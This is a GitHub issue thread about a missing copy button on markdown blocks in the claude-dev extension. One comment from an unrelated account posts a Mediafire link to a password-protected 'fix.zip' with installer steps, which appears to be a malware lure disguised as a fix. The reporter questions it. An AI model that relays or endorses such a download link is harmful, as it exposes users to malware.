### ISSUE TITLE
Add copy button to markdown blocks

### ISSUE THREAD

**Issue by grabani** [saoudrizwan/claude-dev#175]
I recall there being a `Copy` button for any generated markdown, however for the latest release v1.3.43, either it has been deliberately removed or there is a bug where the copy button does not appear so that a person can easily copy generated markdown (especially code). See following screenshot:

![image](https://github.com/user-attachments/assets/85ff5413-bef1-40f5-a918-ce7590e7d819)

Note: Expect to see copy button in the top right.

I am running Clause-Dev in the following environment.

Claude-Dev = v1.3.43
Windows = 11 Pro
VSCode = 1.92.2

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by grabani** [comment]
who are you and what are you telling me to download??

**Comment by saoudrizwan** [comment]
If this is still something you'd like to see added, please feel free to add it in the [ideas board](https://github.com/saoudrizwan/claude-dev/discussions/categories/ideas) so people can vote on it. Thank you!
